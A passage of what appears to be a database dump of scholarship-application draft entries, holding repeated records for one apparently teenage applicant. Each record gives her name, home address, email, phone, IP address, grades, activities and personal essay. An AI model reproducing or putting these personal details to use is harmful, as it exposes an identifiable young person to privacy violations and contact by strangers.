03:46:11','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\",\"36\":\"Wazobia Starz Youth Dance Group \\r\\nChoreographer and Mentor                          [September 2016 - Present]\\r\\nMotivating and mentoring girls ages 5-13 years old through teaching dance as a way to connect with their Nigerian culture\\r\\n\\r\\nNational Honor Society                           \\r\\nVolunteer for community service in and out of school\\r\\n30 hours of community service per school year\",\"37\":\"University of Southern California \\r\\nScripps College\\r\\nUniversity of North Carolina \\r\\nUniversity of Maryland College Park\\r\\nSpelman College\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"As Executive Vice President in FBLA to a Delta Scholar to VP of Supply Chain of Junior Achievement Rising Women, representation and inclusion have defined my high school experiences. I have always claimed the title of the \\u201conly black girl,\\u201d in all my activities: my classroom, girl scout troop, bible study. At first, I dismissed the title because it was all I knew. As I grew older, \\u201conly black girl\\u201d became my anchor for self-confidence, growth, and faith. \\r\\nI observed the lack of representation and its subsequent effect. For me, growing older also meant an influx of hair and skin issues ranging from alopecia to severe acne. The absence of diversity in the dermatology field made it difficult for me to find solutions that would work for my ethnic skin and hair. However, the moment I was seen by a dermatologist who looked like me, an African American woman, she knew immediately what to do. This significant moment inspired me to initiate change and become a dermatologist myself. \\r\\n\\u201cOnly black girl\\u201d is now a label that no longer anchors me, but motivates me to be a part of representation, participating in programs that will affect change. This past summer, I spent three weeks at the University of Pennsylvania Wharton School through the LEAD program. I learned how identities influence consumers decisions from Ester Uduehi, President of the Wharton Society for the Advancement of Women in Business Academia. While visiting Fortune 500 companies such as American Express, Morgan Stanley, and Lion Brothers, I learned about corporate dynamics and responsibilities. Later, interning at a dermatology practice, I had the opportunity to shadow my mentor and also assist in various procedures such as laser treatments, alopecia treatments (cortisone shots, platelet rich plasma treatments), and mole removals. I was also exposed to effective management of a medical practice by my mentor, a woman of color, while conducting research discovering the relationship between curl patterns and hair loss. (https:\\/\\/therbcpa.weebly.com\\/ ) \\r\\nA college education is necessary in order for me the knowledge I need to pursue my dream as a physician entrepreneur. At university, I aspire to major in business while being on a pre-med track during my undergraduate training and to participate in a MD\\/MBA program to pursue my dream as a physician entrepreneur. Growing up in a family of physicians, I have witnessed an increasing need for doctors to possess an extensive knowledge of business and a discernment of the healthcare industry. \\r\\nThis path requires many years of education including undergraduate, medical school, and residency; due to doing both business and medicine, I will most likely have to do another year of undergraduate as well. This adds up to approximately 13-14 years of education and the cost of the journey adds up to about $600,000; a very expensive endeavor. However, no matter the cost, this education is necessary in order for me to become an agent of change in the dermatology field; to be the person who people of color look to for aid.\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\\r\\n\\r\\n\\r\\n\\r\\n\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\\r\\n\",\"36\":\"Wazobia Starz Youth Dance Group \\r\\nChoreographer and Mentor                          [September 2016 - Present]\\r\\nMotivating and mentoring girls ages 5-13 years old through teaching dance as a way to connect with their Nigerian culture\\r\\n\\r\\nNational Honor Society                           \\r\\nVolunteer for community service in and out of school\\r\\n30 hours of community service per school year\",\"37\":\"University of Southern California \\r\\nScripps College\\r\\nUniversity of North Carolina \\r\\nUniversity of Maryland College Park\\r\\nSpelman College\",\"38\":\"\",\"39\":\"\",\"40\":\"As Executive Vice President in FBLA to a Delta Scholar to VP of Supply Chain of Junior Achievement Rising Women, representation and inclusion have defined my high school experiences. I have always claimed the title of the \\u201conly black girl,\\u201d in all my activities: my classroom, girl scout troop, bible study. At first, I dismissed the title because it was all I knew. As I grew older, \\u201conly black girl\\u201d became my anchor for self-confidence, growth, and faith. \\r\\nI observed the lack of representation and its subsequent effect. For me, growing older also meant an influx of hair and skin issues ranging from alopecia to severe acne. The absence of diversity in the dermatology field made it difficult for me to find solutions that would work for my ethnic skin and hair. However, the moment I was seen by a dermatologist who looked like me, an African American woman, she knew immediately what to do. This significant moment inspired me to initiate change and become a dermatologist myself. \\r\\n\\u201cOnly black girl\\u201d is now a label that no longer anchors me, but motivates me to be a part of representation, participating in programs that will affect change. This past summer, I spent three weeks at the University of Pennsylvania Wharton School through the LEAD program. I learned how identities influence consumers decisions from Ester Uduehi, President of the Wharton Society for the Advancement of Women in Business Academia. While visiting Fortune 500 companies such as American Express, Morgan Stanley, and Lion Brothers, I learned about corporate dynamics and responsibilities. Later, interning at a dermatology practice, I had the opportunity to shadow my mentor and also assist in various procedures such as laser treatments, alopecia treatments (cortisone shots, platelet rich plasma treatments), and mole removals. I was also exposed to effective management of a medical practice by my mentor, a woman of color, while conducting research discovering the relationship between curl patterns and hair loss. (https:\\/\\/therbcpa.weebly.com\\/ ) \\r\\nA college education is necessary in order for me the knowledge I need to pursue my dream as a physician entrepreneur. At university, I aspire to major in business while being on a pre-med track during my undergraduate training and to participate in a MD\\/MBA program to pursue my dream as a physician entrepreneur. Growing up in a family of physicians, I have witnessed an increasing need for doctors to possess an extensive knowledge of business and a discernment of the healthcare industry. \\r\\nThis path requires many years of education including undergraduate, medical school, and residency; due to doing both business and medicine, I will most likely have to do another year of undergraduate as well. This adds up to approximately 13-14 years of education and the cost of the journey adds up to about $600,000; a very expensive endeavor. However, no matter the cost, this education is necessary in order for me to become an agent of change in the dermatology field; to be the person who people of color look to for aid. \\r\\n \\r\\n\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Ireheadpic.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e816b83dd858\"}'),('acf380f9bc314c3cb633d6548912df6e',NULL,6,'2020-03-30 03:47:08','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\",\"36\":\"Wazobia Starz Youth Dance Group \\r\\nChoreographer and Mentor                          [September 2016 - Present]\\r\\nMotivating and mentoring girls ages 5-13 years old through teaching dance as a way to connect with their Nigerian culture\\r\\n\\r\\nNational Honor Society                           \\r\\nMember                                 [November 2018 - Present]\\r\\nVolunteer for community service in and out of school\\r\\n30 hours of community service per school year\",\"37\":\"University of Southern California \\r\\nScripps College\\r\\nUniversity of North Carolina \\r\\nUniversity of Maryland College Park\\r\\nSpelman College\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"As Executive Vice President in FBLA to a Delta Scholar to VP of Supply Chain of Junior Achievement Rising Women, representation and inclusion have defined my high school experiences. I have always claimed the title of the \\u201conly black girl,\\u201d in all my activities: my classroom, girl scout troop, bible study. At first, I dismissed the title because it was all I knew. As I grew older, \\u201conly black girl\\u201d became my anchor for self-confidence, growth, and faith. \\r\\nI observed the lack of representation and its subsequent effect. For me, growing older also meant an influx of hair and skin issues ranging from alopecia to severe acne. The absence of diversity in the dermatology field made it difficult for me to find solutions that would work for my ethnic skin and hair. However, the moment I was seen by a dermatologist who looked like me, an African American woman, she knew immediately what to do. This significant moment inspired me to initiate change and become a dermatologist myself. \\r\\n\\u201cOnly black girl\\u201d is now a label that no longer anchors me, but motivates me to be a part of representation, participating in programs that will affect change. This past summer, I spent three weeks at the University of Pennsylvania Wharton School through the LEAD program. I learned how identities influence consumers decisions from Ester Uduehi, President of the Wharton Society for the Advancement of Women in Business Academia. While visiting Fortune 500 companies such as American Express, Morgan Stanley, and Lion Brothers, I learned about corporate dynamics and responsibilities. Later, interning at a dermatology practice, I had the opportunity to shadow my mentor and also assist in various procedures such as laser treatments, alopecia treatments (cortisone shots, platelet rich plasma treatments), and mole removals. I was also exposed to effective management of a medical practice by my mentor, a woman of color, while conducting research discovering the relationship between curl patterns and hair loss. (https:\\/\\/therbcpa.weebly.com\\/ ) \\r\\nA college education is necessary in order for me the knowledge I need to pursue my dream as a physician entrepreneur. At university, I aspire to major in business while being on a pre-med track during my undergraduate training and to participate in a MD\\/MBA program to pursue my dream as a physician entrepreneur. Growing up in a family of physicians, I have witnessed an increasing need for doctors to possess an extensive knowledge of business and a discernment of the healthcare industry. \\r\\nThis path requires many years of education including undergraduate, medical school, and residency; due to doing both business and medicine, I will most likely have to do another year of undergraduate as well. This adds up to approximately 13-14 years of education and the cost of the journey adds up to about $600,000; a very expensive endeavor. However, no matter the cost, this education is necessary in order for me to become an agent of change in the dermatology field; to be the person who people of color look to for aid.\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\\r\\n\\r\\n\\r\\n\\r\\n\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\\r\\n\",\"36\":\"Wazobia Starz Youth Dance Group \\r\\nChoreographer and Mentor                          [September 2016 - Present]\\r\\nMotivating and mentoring girls ages 5-13 years old through teaching dance as a way to connect with their Nigerian culture\\r\\n\\r\\nNational Honor Society                           \\r\\nMember                                 [November 2018 - Present]\\r\\nVolunteer for community service in and out of school\\r\\n30 hours of community service per school year\",\"37\":\"University of Southern California \\r\\nScripps College\\r\\nUniversity of North Carolina \\r\\nUniversity of Maryland College Park\\r\\nSpelman College\",\"38\":\"\",\"39\":\"\",\"40\":\"As Executive Vice President in FBLA to a Delta Scholar to VP of Supply Chain of Junior Achievement Rising Women, representation and inclusion have defined my high school experiences. I have always claimed the title of the \\u201conly black girl,\\u201d in all my activities: my classroom, girl scout troop, bible study. At first, I dismissed the title because it was all I knew. As I grew older, \\u201conly black girl\\u201d became my anchor for self-confidence, growth, and faith. \\r\\nI observed the lack of representation and its subsequent effect. For me, growing older also meant an influx of hair and skin issues ranging from alopecia to severe acne. The absence of diversity in the dermatology field made it difficult for me to find solutions that would work for my ethnic skin and hair. However, the moment I was seen by a dermatologist who looked like me, an African American woman, she knew immediately what to do. This significant moment inspired me to initiate change and become a dermatologist myself. \\r\\n\\u201cOnly black girl\\u201d is now a label that no longer anchors me, but motivates me to be a part of representation, participating in programs that will affect change. This past summer, I spent three weeks at the University of Pennsylvania Wharton School through the LEAD program. I learned how identities influence consumers decisions from Ester Uduehi, President of the Wharton Society for the Advancement of Women in Business Academia. While visiting Fortune 500 companies such as American Express, Morgan Stanley, and Lion Brothers, I learned about corporate dynamics and responsibilities. Later, interning at a dermatology practice, I had the opportunity to shadow my mentor and also assist in various procedures such as laser treatments, alopecia treatments (cortisone shots, platelet rich plasma treatments), and mole removals. I was also exposed to effective management of a medical practice by my mentor, a woman of color, while conducting research discovering the relationship between curl patterns and hair loss. (https:\\/\\/therbcpa.weebly.com\\/ ) \\r\\nA college education is necessary in order for me the knowledge I need to pursue my dream as a physician entrepreneur. At university, I aspire to major in business while being on a pre-med track during my undergraduate training and to participate in a MD\\/MBA program to pursue my dream as a physician entrepreneur. Growing up in a family of physicians, I have witnessed an increasing need for doctors to possess an extensive knowledge of business and a discernment of the healthcare industry. \\r\\nThis path requires many years of education including undergraduate, medical school, and residency; due to doing both business and medicine, I will most likely have to do another year of undergraduate as well. This adds up to approximately 13-14 years of education and the cost of the journey adds up to about $600,000; a very expensive endeavor. However, no matter the cost, this education is necessary in order for me to become an agent of change in the dermatology field; to be the person who people of color look to for aid. \\r\\n \\r\\n\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Ireheadpic.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e816bbc750b6\"}'),('9ae5c2724dc74334bf1276f56af3a9d1',NULL,6,'2020-03-30 03:47:41','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\",\"36\":\"Wazobia Starz Youth Dance Group \\r\\nChoreographer and Mentor                          [September 2016 - Present]\\r\\nMotivating and mentoring girls ages 5-13 years old through teaching dance as a way to connect with their Nigerian culture\\r\\n\\r\\nNational Honor Society                           \\r\\nMember                                 [November 2018 - Present]\\r\\nVolunteer for community service in and out of school\\r\\n30 hours of community service per school year\\r\\n\\r\\nStudent Member of the Board \\r\\nStudent Delegate \\t\\t\\t\\t             [February 2018]\\r\\nHelped to elect the final Student Member of the Board candidates and communicated information to students of River Hill High School\",\"37\":\"University of Southern California \\r\\nScripps College\\r\\nUniversity of North Carolina \\r\\nUniversity of Maryland College Park\\r\\nSpelman College\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"As Executive Vice President in FBLA to a Delta Scholar to VP of Supply Chain of Junior Achievement Rising Women, representation and inclusion have defined my high school experiences. I have always claimed the title of the \\u201conly black girl,\\u201d in all my activities: my classroom, girl scout troop, bible study. At first, I dismissed the title because it was all I knew. As I grew older, \\u201conly black girl\\u201d became my anchor for self-confidence, growth, and faith. \\r\\nI observed the lack of representation and its subsequent effect. For me, growing older also meant an influx of hair and skin issues ranging from alopecia to severe acne. The absence of diversity in the dermatology field made it difficult for me to find solutions that would work for my ethnic skin and hair. However, the moment I was seen by a dermatologist who looked like me, an African American woman, she knew immediately what to do. This significant moment inspired me to initiate change and become a dermatologist myself. \\r\\n\\u201cOnly black girl\\u201d is now a label that no longer anchors me, but motivates me to be a part of representation, participating in programs that will affect change. This past summer, I spent three weeks at the University of Pennsylvania Wharton School through the LEAD program. I learned how identities influence consumers decisions from Ester Uduehi, President of the Wharton Society for the Advancement of Women in Business Academia. While visiting Fortune 500 companies such as American Express, Morgan Stanley, and Lion Brothers, I learned about corporate dynamics and responsibilities. Later, interning at a dermatology practice, I had the opportunity to shadow my mentor and also assist in various procedures such as laser 